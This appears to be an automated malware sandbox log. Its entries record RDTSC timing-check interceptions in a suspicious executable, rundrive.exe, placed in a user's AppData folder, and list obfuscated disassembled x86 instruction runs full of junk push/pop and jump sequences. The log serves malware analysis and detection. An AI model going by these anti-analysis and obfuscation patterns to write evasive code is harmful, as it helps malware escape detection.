Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930BB8 second address: 4930BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a mov eax, 3520218Fh 0x0000000f mov edi, esi 0x00000011 popad 0x00000012 xchg eax, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDA80C0087Dh 0x0000001a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930BDA second address: 4930C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDA80C026C7h 0x00000009 jmp 00007FDA80C026C3h 0x0000000e popfd 0x0000000f mov edi, eax 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 jmp 00007FDA80C026C5h 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FDA80C026BDh 0x00000022 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930C34 second address: 4930C80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b jmp 00007FDA80C00887h 0x00000010 test dword ptr [ebp+0Ch], FFFF0000h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDA80C00885h 0x0000001e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930C80 second address: 4930CA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 67h 0x00000005 movzx eax, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FDAF1D7864Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDA80C026BEh 0x00000018 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930CA1 second address: 4930CDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FDA80C00882h 0x00000015 adc ecx, 1EC62EA8h 0x0000001b jmp 00007FDA80C0087Bh 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930CDB second address: 4930D96 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDA80C026C8h 0x00000008 and cx, 2108h 0x0000000d jmp 00007FDA80C026BBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ecx 0x00000016 mov ax, dx 0x00000019 pop ebx 0x0000001a popad 0x0000001b mov ecx, dword ptr [ebp+08h] 0x0000001e pushad 0x0000001f mov ebx, ecx 0x00000021 jmp 00007FDA80C026C8h 0x00000026 popad 0x00000027 push E34DA7C5h 0x0000002c pushad 0x0000002d call 00007FDA80C026C7h 0x00000032 pushfd 0x00000033 jmp 00007FDA80C026C8h 0x00000038 adc eax, 187A1828h 0x0000003e jmp 00007FDA80C026BBh 0x00000043 popfd 0x00000044 pop ecx 0x00000045 mov ebx, 0D8AE46Ch 0x0000004a popad 0x0000004b add dword ptr [esp], 1CB2D87Bh 0x00000052 jmp 00007FDA80C026BBh 0x00000057 xchg eax, edi 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930D96 second address: 4930D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930D9A second address: 4930D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930D9E second address: 4930DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930DA4 second address: 4930DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930DAA second address: 4930DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930DAE second address: 4930DB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930DB2 second address: 4930E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov eax, ebx 0x0000000c call 00007FDA80C0087Dh 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 popad 0x00000015 xchg eax, edi 0x00000016 pushad 0x00000017 mov ebx, 3127AF7Eh 0x0000001c pushfd 0x0000001d jmp 00007FDA80C0087Fh 0x00000022 or ch, 0000002Eh 0x00000025 jmp 00007FDA80C00889h 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, edi 0x0000002d jmp 00007FDA80C0087Eh 0x00000032 push eax 0x00000033 jmp 00007FDA80C0087Bh 0x00000038 xchg eax, edi 0x00000039 jmp 00007FDA80C00886h 0x0000003e push 00000001h 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FDA80C00887h 0x00000047 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930E51 second address: 4930E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930E57 second address: 4930E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930E5B second address: 4930E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930E78 second address: 4930EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 7A91BAF3h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c jmp 00007FDA80C00886h 0x00000011 leave 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930EA1 second address: 4930EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930EA5 second address: 4930EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930EA9 second address: 4930EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930EAF second address: 4930EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930EB4 second address: 493002B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026C0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c retn 0008h 0x0000000f mov dword ptr [ebp-30h], eax 0x00000012 mov dword ptr [ebp-2Ch], 00000006h 0x00000019 lea eax, dword ptr [ebp-48h] 0x0000001c push eax 0x0000001d call 00007FDA80C0425Bh 0x00000022 jmp 00007FDA8512F580h 0x00000027 mov edi, edi 0x00000029 pushad 0x0000002a mov esi, 2C4059BDh 0x0000002f pushfd 0x00000030 jmp 00007FDA80C026BAh 0x00000035 add ah, FFFFFF98h 0x00000038 jmp 00007FDA80C026BBh 0x0000003d popfd 0x0000003e popad 0x0000003f xchg eax, ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 mov si, dx 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 493002B second address: 49300F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00883h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pushfd 0x00000010 jmp 00007FDA80C00881h 0x00000015 adc si, C496h 0x0000001a jmp 00007FDA80C00881h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FDA80C0087Eh 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov ax, 46CDh 0x0000002e pushfd 0x0000002f jmp 00007FDA80C0087Ah 0x00000034 jmp 00007FDA80C00885h 0x00000039 popfd 0x0000003a popad 0x0000003b and esp, FFFFFFF8h 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 call 00007FDA80C00883h 0x00000046 pop eax 0x00000047 pushfd 0x00000048 jmp 00007FDA80C00889h 0x0000004d or ecx, 61D8DB66h 0x00000053 jmp 00007FDA80C00881h 0x00000058 popfd 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49300F7 second address: 49300FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49300FC second address: 49301DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FDA80C0087Dh 0x0000000a and esi, 71EA04C6h 0x00000010 jmp 00007FDA80C00881h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 sub esp, 30h 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FDA80C0087Ch 0x00000023 or ah, 00000068h 0x00000026 jmp 00007FDA80C0087Bh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007FDA80C00888h 0x00000032 sbb cx, D7C8h 0x00000037 jmp 00007FDA80C0087Bh 0x0000003c popfd 0x0000003d popad 0x0000003e mov eax, dword ptr [ebp+08h] 0x00000041 pushad 0x00000042 call 00007FDA80C00884h 0x00000047 push eax 0x00000048 pop ebx 0x00000049 pop esi 0x0000004a pushad 0x0000004b jmp 00007FDA80C0087Dh 0x00000050 pushfd 0x00000051 jmp 00007FDA80C00880h 0x00000056 adc si, 8C88h 0x0000005b jmp 00007FDA80C0087Bh 0x00000060 popfd 0x00000061 popad 0x00000062 popad 0x00000063 sub edx, edx 0x00000065 push eax 0x00000066 push edx 0x00000067 pushad 0x00000068 jmp 00007FDA80C00880h 0x0000006d mov bx, ax 0x00000070 popad 0x00000071 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49301DA second address: 493021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FDA80C026C2h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FDA80C026BCh 0x00000018 adc ah, 00000078h 0x0000001b jmp 00007FDA80C026BBh 0x00000020 popfd 0x00000021 mov ax, A7AFh 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 493021A second address: 4930267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 67676666h 0x00000008 pushfd 0x00000009 jmp 00007FDA80C00887h 0x0000000e xor ax, D0EEh 0x00000013 jmp 00007FDA80C00889h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 movsx edx, si 0x00000023 mov di, si 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930267 second address: 4930277 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C026BCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930277 second address: 49302C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov edx, 6947F286h 0x00000014 pushfd 0x00000015 jmp 00007FDA80C00887h 0x0000001a add ax, 090Eh 0x0000001f jmp 00007FDA80C00889h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49302C9 second address: 4930359 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FDA80C026C1h 0x0000000f xchg eax, edi 0x00000010 jmp 00007FDA80C026BEh 0x00000015 push 00000009h 0x00000017 jmp 00007FDA80C026C0h 0x0000001c pop ecx 0x0000001d pushad 0x0000001e mov di, cx 0x00000021 pushad 0x00000022 mov bh, ch 0x00000024 push ebx 0x00000025 pop esi 0x00000026 popad 0x00000027 popad 0x00000028 lea esi, dword ptr [eax+04h] 0x0000002b pushad 0x0000002c mov dl, 64h 0x0000002e call 00007FDA80C026C6h 0x00000033 push ecx 0x00000034 pop edi 0x00000035 pop eax 0x00000036 popad 0x00000037 mov eax, dword ptr [eax] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FDA80C026C8h 0x00000040 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930359 second address: 49303F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000001h 0x0000000b jmp 00007FDA80C00886h 0x00000010 lea edi, dword ptr [esp+14h] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FDA80C0087Eh 0x0000001b xor ax, 3E98h 0x00000020 jmp 00007FDA80C0087Bh 0x00000025 popfd 0x00000026 movzx esi, bx 0x00000029 popad 0x0000002a rep movsd 0x0000002c rep movsd 0x0000002e rep movsd 0x00000030 rep movsd 0x00000032 rep movsd 0x00000034 rep movsd 0x00000036 rep movsd 0x00000038 rep movsd 0x0000003a rep movsd 0x0000003c pushad 0x0000003d mov dh, AEh 0x0000003f popad 0x00000040 and dword ptr [esp+38h], 00000000h 0x00000045 jmp 00007FDA80C0087Fh 0x0000004a lea ecx, dword ptr [esp+0Ch] 0x0000004e pushad 0x0000004f movzx eax, di 0x00000052 push edi 0x00000053 mov ecx, 0573DBC3h 0x00000058 pop esi 0x00000059 popad 0x0000005a call 00007FDA80C00879h 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FDA80C00882h 0x00000066 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49303F0 second address: 49303F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49303F5 second address: 4930410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDA80C0087Fh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930410 second address: 49304A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FDA80C026C1h 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 movsx ebx, cx 0x00000018 pushfd 0x00000019 jmp 00007FDA80C026C8h 0x0000001e add al, FFFFFFA8h 0x00000021 jmp 00007FDA80C026BBh 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FDA80C026C2h 0x00000035 sbb esi, 0C43DC08h 0x0000003b jmp 00007FDA80C026BBh 0x00000040 popfd 0x00000041 push eax 0x00000042 pop ebx 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49304A0 second address: 49304CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d mov ecx, 7FFDDC5Fh 0x00000012 popad 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov eax, edi 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49304CB second address: 4930500 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+18h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDA80C026C7h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930500 second address: 4930506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930506 second address: 493050A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4930558 second address: 493055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 493055E second address: 49305E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDA80C026BCh 0x00000013 add ch, 00000078h 0x00000016 jmp 00007FDA80C026BBh 0x0000001b popfd 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FDA80C026C6h 0x00000023 xor ecx, 0E011FD8h 0x00000029 jmp 00007FDA80C026BBh 0x0000002e popfd 0x0000002f mov bx, si 0x00000032 popad 0x00000033 popad 0x00000034 mov esp, ebp 0x00000036 jmp 00007FDA80C026C2h 0x0000003b pop ebp 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FDA80C026BAh 0x00000045 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49305E1 second address: 49305F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49305F0 second address: 4950013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDA80C026BFh 0x00000009 sub esi, 1D161CAEh 0x0000000f jmp 00007FDA80C026C9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 retn 0004h 0x0000001b push 00000000h 0x0000001d push dword ptr [ebp-04h] 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push 00000096h 0x00000029 push 000001F4h 0x0000002e push FFFFFC18h 0x00000033 push FFFFFC18h 0x00000038 push 00C80000h 0x0000003d lea eax, dword ptr [ebp-0000014Ch] 0x00000043 push eax 0x00000044 lea eax, dword ptr [ebp-0000024Ch] 0x0000004a push eax 0x0000004b push 00000080h 0x00000050 call 00007FDA80C041EBh 0x00000055 jmp 00007FDA8514F5B6h 0x0000005a mov edi, edi 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f call 00007FDA80C026BCh 0x00000064 pop esi 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950013 second address: 4950036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00880h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDA80C0087Ah 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950036 second address: 495003C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 495003C second address: 495006E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FDA80C0087Ch 0x00000009 sbb cx, E638h 0x0000000e jmp 00007FDA80C0087Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDA80C0087Bh 0x0000001f rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 495006E second address: 49500F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, esi 0x0000000d mov ebx, esi 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 jmp 00007FDA80C026C2h 0x00000017 sub eax, eax 0x00000019 jmp 00007FDA80C026C1h 0x0000001e mov edx, dword ptr [ebp+0Ch] 0x00000021 pushad 0x00000022 mov al, 65h 0x00000024 popad 0x00000025 nop 0x00000026 jmp 00007FDA80C026C2h 0x0000002b push eax 0x0000002c jmp 00007FDA80C026BBh 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FDA80C026C0h 0x0000003b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49500F4 second address: 49500FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49500FA second address: 4950100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950100 second address: 4950104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950104 second address: 495012E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FDA80C026C4h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movzx ecx, bx 0x00000015 mov edi, 082E2FBCh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 495012E second address: 4950153 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00882h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDA80C0087Ah 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950153 second address: 4950157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950157 second address: 495015D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 495015D second address: 495016E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C026BDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 495016E second address: 4950191 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 329FAC80h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx eax, di 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950191 second address: 49501D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 729FAC81h 0x00000010 jmp 00007FDA80C026C0h 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDA80C026C7h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49501D4 second address: 49501E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov dl, 78h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49501E5 second address: 49501E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49501E9 second address: 49501ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49501ED second address: 49501F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49501F3 second address: 49501F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
